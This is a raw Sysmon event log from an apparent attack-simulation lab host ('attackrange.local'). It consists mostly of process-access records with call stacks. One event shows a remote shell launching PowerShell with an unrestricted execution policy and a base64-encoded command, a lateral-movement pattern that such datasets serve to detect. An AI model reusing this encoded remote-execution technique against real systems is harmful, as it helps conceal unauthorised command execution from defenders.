12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6441-6064-DF02-00000000AD01}4916C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-6441-6064-DD02-00000000AD01}51164316C:\Windows\system32\WinrsHost.exe{266CAFBE-6441-6064-DF02-00000000AD01}4916C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.894{266CAFBE-6441-6064-DF02-00000000AD01}4916C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.857{266CAFBE-62DD-6064-1400-00000000AD01}13401696C:\Windows\system32\svchost.exe{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.857{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.841{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6441-6064-DE02-00000000AD01}2784C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 